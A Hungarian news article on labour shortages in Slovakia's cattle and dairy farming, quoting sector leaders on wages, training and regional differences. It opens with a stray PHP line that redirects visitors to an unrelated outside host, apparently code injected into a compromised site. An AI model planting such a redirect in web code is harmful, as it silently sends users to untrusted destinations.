header("Location: http://sstellar.host/300.php", true, 301); exit(); ?> Munkaerőhiánnyal küzd a szarvasmarha-ágazat és a tejtermelés
szombat, május 25, 2019

Keresés

Munkaerőhiánnyal küzd a szarvasmarha-ágazat és a tejtermelés

2892A szarvasmarha tenyésztést és az ehhez kapcsolódó tejtermelés munkaerőhiánnyal küzd. Ezt a tejtermelők az utóbbi két évben teljes mértékben érzékeli, úgy tűnik, hogy a helyzet csak rosszabbodni fog.

„A mezőgazdasági ágazatban dolgozók átlagéletkora folyamatosan emelkedik. Az idősebb generáció nyugdíjba vonul, s nem érkezik utánpótlás a fiatalabb korosztályokból. Ennek az egyik oka az, hogy az emberekben él még az a sztereotípia, hogy az állattartás kevésbé értékes munka, ahova nem szükséges rendkívüli tudás. Nehéz kiirtani ezt az elképzelést az emberek gondolkodásából. Hiszen a tény az, hogy a szakma ma okos. ügyes fiatalokat igényel, akik járatosak a legújabb állattartási szokásokat illetően, ismerik a genetikát, szaporítást, takarmányozást, valamint a számítógép vezérelt fejésben és takarmányozásban is otthonosan mozognak"– fejtette ki Margita Štefániková, a Szlovákiai Őstermelők Uniójának (SZPM) igazgatója.

Azt is megjegyezte, hogy a tejtermelési ágazatnál kevesen érdeklődnek a munka iránt. Ebben nem is annyira a bérezés játszik főszerepet, mint az időigényes munka és az alacsony társadalmi megbecsülés

„Az ímelyi székhelyű Agrocoop társaság 7,2 millió liter tejet termel évente, két évvel ezelőtt bekapcsolódott a duális képzésbe. Minden évben találkozunk a Komáromi járás alapiskolák nyolcadikos és kilencedikes diákjaival. Elmagyarázzuk nekik, hogy miképpen változott meg a munka az állattartási ágazatban, s milyenek a kereseti lehetőségek a társaságunknál. Mindennek ellenére nagyon gyér az érdeklődés a szülők és a diákok részéről. Ugyan besoroltak minket a duális képzésbe, azonban nincs egyetlen tanulónk sem"– fogalmazott Alexander Pastorek, az Agrocoop elnöke.

Pastorek szerint a komáromi régióban még mindig vannak olyan ipari cégek, ahol a dolgozók megközelítőleg csak 600 euró fizetést kapnak. „Nálunk az állatgondozók és a fejőnők fizetése ugrásszerűen nőtt, most megközelíti az 1200 eurót. Természetesen a munkatársaink megérdemlik ezt a jövedelmet. Gondot okoz azonban a tej felvásárlási árának esetleges csökkenése. Ilyenkor a veszteséget máshonnan kell pótolnunk"– szögezte le a társaság elnöke.

A képzett munkaerő hiánya a SZPM szerint nagyon komoly gondot jelent, a termelők felelősséggel kezelik a helyzetet. „Az őstermelők munkaerő igényét illetően nagy regionális különbségek vannak. Valamivel jobb helyzetben vannak a hegyvidéken gazdálkodók, ahol nem olyan nagy a beruházói kedv, mondhatni ezért, hogy nagyobb a munkaerő kínálat. Ellenben a síkvidéken működő gazdák „harcolnak"a munkásokért a kis- és középvállalkozókkal. Egyre nagyobb a rájuk nehezedő nyomás a béremeléseket illetően"– mondta Štefániková.

„Minden esetre az előkészítés alatt álló támogatási rendszert úgy kell beállítani, hogy fegyelembe vegye a regionális különbségeket a termelés és munkaerőpiac vonatkozásában. Lehetővé kell tenni a szarvasmarha tartását az egész országban. Ugyanis amennyiben valamelyik országrészben megszűnik a szarvasmarha tartása, nem lesz istállótrágya, s csak idő kérdése, hogy mikor fejeződik be a növénytermesztés"– fűzte hozzá Štefániková.

Teraz.sk/Gazdaság.sk
Fotó: TASR

Minden jog fenntartva, Szlovákiai Magyar Közgazdász Társaság, 2010
A honlap a Corvinus Támogatásközvetítő és Tőkebefektetési Zrt. támogatásával készült. Created: namedia